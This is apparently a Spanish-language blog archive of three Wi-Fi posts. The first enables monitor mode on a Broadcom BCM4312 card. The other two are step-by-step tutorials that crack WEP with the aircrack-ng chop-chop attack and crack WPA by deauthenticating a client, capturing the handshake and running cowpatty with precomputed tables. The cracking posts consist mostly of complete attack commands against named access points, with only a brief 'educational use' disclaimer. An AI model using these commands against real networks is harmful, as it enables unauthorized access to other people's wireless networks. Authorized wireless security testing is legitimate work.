Archive for the Wifi Category

Como habilitar el modo monitor en BCM4312

Posted in Wifi on julio 29, 2010 by waldoredes

Después de un año de tener mi portátil el cual posee una tarjeta inalambrica con chip BCM4312 y solo hasta ahora he logrado habilitarle el modo monitor.

Para habilitar el modo monitor debemos de cumplir con tres requisitos

  1. kernel linux-2.6.32 o superior
  2. b43-fwcutter 4.174.64.19 o superior
  3. git-core

Para comprar si tu tarjeta es compatible con este proceso ejecuta este comando

# lspci -nn | grep Network

Como podemos ver en la imagen anterior la tarjeta que tenemos es una Broadcom con chip bcm4312 y que nuestro Device ID es 14e4:4315

Comprobaremos la versión de nuestro kernel con este comando

# uname -r

GUIA

Descargamos el firmware con este comando

# wget http://downloads.openwrt.org/sources/broadcom-wl-4.178.10.4.tar.bz2

Descomprimidos y desempaquetados el paquete

# tar xjf  broadcom-wl-4.178.10.4.tar.bz2

Instalaremos git-core

# apt-get install git-core

Con los siguientes comandos vamos a instalar la aplicación que nos va a extraer el firmware

Primero descargamos el paquete de la siguinte forma

# git clone git://git.bu3sch.de/b43-tools.git

Ingresamos al directorio

# cd b43-tools/fwcutter/

Compilamos

# make

Ingresamos al directorio donde se encuentra el firmware

# cd broadcom-wl-4.178.10.4/linux

Vamos a extraer el firmware en /lib/firmware con el siguiente comando

# ../../b43-tools/fwcutter/b43-fwcutter -w /lib/firmware wl_apsta.o

Reniciamos

# reboot

Instalaremos la suite de aircrack-ng

# apt-get install aircrack-ng

Ponemos nuestra en modo monitor

# airmon-ng stop wlan0


# airmon-ng start wlan0

Comprobamos de que si este en modo monitor

# iwconfig

Hacemos una pequeña prueba

# airodump-ng mon0

Buendo esto es todo si quiere seguir  probando miren estos otros tutos bajo su propia responsabilidad

Ataque Chop-Chop

Ataque WPA Rainbows Tables

Ataque Chop-Chop a WEP

Posted in Wifi on septiembre 23, 2009 by waldoredes

En este post les enseñare como romper un cifrado WEP

primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando

#iwconfig

iwconfig1

Como podemos ver en la imagen anterior mi dispositvo se llama wlan0

lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor)

#airmon-ng stop wlan0

airmon1

#airmon-ng start wlan0

airmon2

Ahora localizamos el AP

#airodump-ng wlan0

airodum-ng3

Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP

#airodump-ng c 1 -w prueba -i wlan0

airodum-ng

El siguiente paso es asociarnos contra el AP victima con el siguinte comando

#aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 wlan0

aireplay-ng2

Ahora vamos a usar el ataque Chop-Chop

#aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18:FB wlan0

aireplay-ng4

Despues presionamos la tecla “y”

aireplay-ng5

Ahora creamos una petición de paquete arp usando el archivo .xor:

#packetforge-ng -0 -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request

15

Ahora enviaremos el paquete ARP creado anteriormente

#aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0

225

En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contraseña

21

Ahora vamos a descifrar la contraseña con el siguiente comando

aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18:FB prueba-02*.ivs

23

Como podemos ver en la imagen anterrior tenemos la contraseña en tipo ASCII y la contraseña es WALDO

Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP.

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.

Como Crackear una WPA con Rainbows Tables

Posted in Wifi on septiembre 17, 2009 by waldoredes

Bueno el primer procesdimiento es mirar como se llama nuestra tarjeta de red inalambrica con el siguiente comando

#iwconfig

iwconfig1

En la imagen anterior podemos ver el nombre de mi tarjeta de red inlambrica es wlan0

ahora lo pondremos la tarjeta  en modo monitor con los siguintes dos comandos

#airmon-ng stop wlan0

#airmon-ng start wlan0

airmon2

Debe aparecer algo similar como en la  imagen anterior

ahora vamos a escanear las redes que estan a nuestro alcance

#airodum-ng wlan0

airodum29

En la imagen anterior podemos ver que a nuestro alcance hay un red wireles que tiene un tipo de encriptacion WPA-TKIP vamos anotar la MAC (BSSID) el nombre (ESSID) y el canal (CH)

Ahora usaremos airodum-ng para capturar el handshake

#airodump-ng –c 1 –bssid 00:A0:56:9A:18:FB –w prueba wlan0

1

Como vemos en la imagen anterior vemos que en el  AP hay  un cliente asociado entonces vamos  hacerle una desautenticacion al cliente que tiene conectado para nosotros poder capturar el handshake

#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0

3

2

En la parte superior de la imagen vemos que obtuvimos el handshake
Ahora procedemos a crackear la contraseña con el siguiente comando

#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

airodum6

En la imagen anterior podemos ver la velocidad de crackeo de una red con WPA y la password es JONATHAN

NOTA:

Para poder crackear la contraseña el SSID debe de ser el mismo de las Rainbows Tables me explico si el SSID es por ejemplo thomson y en las Rainbows Tables es Thomson no puede descifrar la contraseña.

En el siguinte link pueden descargar las Rainbows Tables y encontrar mas información

http://hak5.org/forums/index.php?showtopic=12708%3Cbr%3E

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.